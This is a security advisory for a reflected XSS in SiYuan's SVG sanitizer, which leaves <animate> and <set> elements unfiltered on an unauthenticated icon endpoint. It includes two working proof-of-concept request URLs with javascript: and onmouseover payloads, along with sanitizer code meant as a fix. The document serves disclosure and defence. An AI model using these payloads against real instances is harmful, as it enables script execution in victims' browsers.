CVE-2026-31807 is a medium severity vulnerability with a CVSS score of 6.1. Exploits are available; patches have been released and should be applied urgently.
EPSS (probability of exploitation in the next 30 days): very low.
`<animate>` Element — Unauthenticated XSS

SiYuan's SVG sanitizer (SanitizeSVG) blocks dangerous elements (`<script>`, `<iframe>`, `<foreignobject>`) and removes `on*` event handlers and `javascript:` in `href` attributes. However, it does NOT block SVG animation elements (`<animate>`, `<set>`), which can dynamically set attributes to dangerous values at runtime, bypassing the static sanitization. This allows an attacker to inject executable JavaScript into the unauthenticated /api/icon/getDynamicIcon endpoint (type=8), creating a reflected XSS.
This is a bypass of the fix for CVE-2026-29183 (fixed in v3.5.9).
Affected file: kernel/util/misc.go
Function: SanitizeSVG() (lines 234-319)
Endpoint: GET /api/icon/getDynamicIcon?type=8&content=... (unauthenticated)

The sanitizer checks attributes on elements at parse time. SVG `<animate>` and `<set>` elements modify attributes at runtime — these elements are not in the sanitizer's blocklist.
```go
// Element blocklist in SanitizeSVG (excerpt)
if tag == "script" || tag == "iframe" || tag == "object" || tag == "embed" || tag == "foreignobject" {
	n.RemoveChild(c)
	// ...
}
```

Missing from the blocklist: `animate`, `set`, `animateTransform`, `animateMotion`.

```go
// Attribute check in SanitizeSVG (excerpt)
// Only checks static attributes
if strings.HasPrefix(key, "on") {
	continue
}
```
The `<animate>` element's `values` attribute contains the payload (`javascript:...`), but the sanitizer only checks for the `on*` prefix, `href`, or `xlink:href` keys. The `values`, `to`, `from`, `attributeName` attributes are all passed through.

| Vendor | Product |
|---|---|
| B3log | Siyuan |

`<animate>` sets `href` to `javascript:`

```
GET /api/icon/getDynamicIcon?type=8&content=</text><a><animate attributeName="href" values="javascript:alert(document.domain)" begin="0s" fill="freeze"/><text x="50%25" y="80%25" fill="red" style="font-size:60px">Click me</text></a><text>&color=blue
```
After template rendering, the SVG contains:

```xml
<svg ...>
  <text ...></text>
  <a>
    <animate attributeName="href" values="javascript:alert(document.domain)" begin="0s" fill="freeze"/>
    <text x="50%" y="80%" fill="red" style="font-size:60px">Click me</text>
  </a>
  <text></text>
</svg>
```
The sanitizer passes this through because:

- `<animate>` is not in the element blocklist
- `attributeName="href"`: the key is `attributename`, which doesn't start with `on` and is not `href` itself
- `values="javascript:..."`: the key is `values`, not `href`

When the SVG is rendered in the browser (navigating directly to the URL), `<animate>` sets the parent `<a>` element's `href` to `javascript:alert(document.domain)`. Clicking "Click me" triggers the JavaScript.
`<set>` modifies event handlers

```
GET /api/icon/getDynamicIcon?type=8&content=</text><set attributeName="onmouseover" to="alert(document.domain)"/><text>&color=blue
```

The `<set>` element dynamically adds an `onmouseover` event handler to the parent element at runtime.
- Delivery: the getDynamicIcon URL with the XSS payload
- Served as image/svg+xml, so the browser renders it as a standalone SVG document

Fix: add the animation elements to the sanitizer blocklist:
```go
// In SanitizeSVG, line 250:
if tag == "script" || tag == "iframe" || tag == "object" || tag == "embed" ||
	tag == "foreignobject" || tag == "animate" || tag == "set" ||
	tag == "animatetransform" || tag == "animatemotion" {
	n.RemoveChild(c)
	c = next
	continue
}
```
Or additionally check the `values`, `to`, and `from` attributes for `javascript:` patterns:

```go
// Inside the attribute loop of SanitizeSVG. Note that this match is case-sensitive,
// so compare against a lowercased, whitespace-trimmed value in practice.
if key == "values" || key == "to" || key == "from" {
	if strings.Contains(val, "javascript:") {
		continue // drop the attribute
	}
}
```
Also consider checking `attributeName`: if it targets `href`, `xlink:href`, or any `on*` attribute, the animation element should be removed entirely.
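The fix above, carried through as a complete sanitizer. This is an added example written for this page, not SiYuan's SanitizeSVG: it uses only the standard library (encoding/xml), drops the four SMIL animation elements with their subtrees, strips `on*` handlers, and rejects `javascript:` in `href`/`xlink:href` as well as `values`/`to`/`from`, compared case-insensitively after trimming whitespace. The names `blockedTags`, `urlAttrs`, `dropAttr`, `SanitizeSVG` and `Sample` are mine, `Sample` is a constructed input combining both PoCs above, and namespace prefixes are flattened to local names as a simplification.

```go
package main

import (
	"encoding/xml"
	"html"
	"io"
	"strings"
)
// Blocked elements are dropped with their subtree; the four SMIL ones are this advisory's additions.
var blockedTags = map[string]bool{"script": true, "iframe": true, "object": true, "embed": true,
	"foreignobject": true, "animate": true, "set": true, "animatetransform": true, "animatemotion": true}
var urlAttrs = map[string]bool{"href": true, "values": true, "to": true, "from": true} // URL or animated into one
// Sample is a constructed document combining both payloads shown in this advisory.
const Sample = `<svg xmlns="http://www.w3.org/2000/svg"><a><animate attributeName="href" values="javascript:alert(document.domain)" begin="0s" fill="freeze"/>` +
	`<text x="50%">Click me</text></a><set attributeName="onmouseover" to="alert(document.domain)"/><rect width="10" onclick="alert(1)"/></svg>`
// dropAttr: on* handlers, and javascript: in URL-bearing attributes (prefix ignored, so xlink:href counts as href).
func dropAttr(a xml.Attr) bool {
	key, val := strings.ToLower(a.Name.Local), strings.ToLower(strings.TrimSpace(a.Value)) // "JaVaScRiPt:" also runs
	return strings.HasPrefix(key, "on") || (urlAttrs[key] && strings.Contains(val, "javascript:"))
}
// SanitizeSVG re-serialises without blocked subtrees, bad attributes, comments or PIs; prefixes are flattened.
func SanitizeSVG(in string) (string, error) {
	dec, out := xml.NewDecoder(strings.NewReader(in)), &strings.Builder{}
	for tok, err := dec.Token(); err != io.EOF; tok, err = dec.Token() {
		if err != nil {
			return "", err // malformed input is rejected rather than "fixed up"
		}
		switch t := tok.(type) {
		case xml.StartElement:
			if blockedTags[strings.ToLower(t.Name.Local)] {
				if err := dec.Skip(); err != nil { // drops the element and everything inside it
					return "", err
				}
				continue
			}
			out.WriteString("<" + t.Name.Local)
			for _, a := range t.Attr {
				if !dropAttr(a) {
					out.WriteString(" " + a.Name.Local + `="` + html.EscapeString(a.Value) + `"`)
				}
			}
			out.WriteString(">")
		case xml.EndElement:
			out.WriteString("</" + t.Name.Local + ">")
		case xml.CharData:
			out.WriteString(html.EscapeString(string(t)))
		}
	}
	return out.String(), nil
}
```

Running `SanitizeSVG(Sample)` yields `<svg xmlns="http://www.w3.org/2000/svg"><a><text x="50%">Click me</text></a><rect width="10"></rect></svg>`: both animation elements are gone and the `onclick` handler is stripped while harmless markup survives.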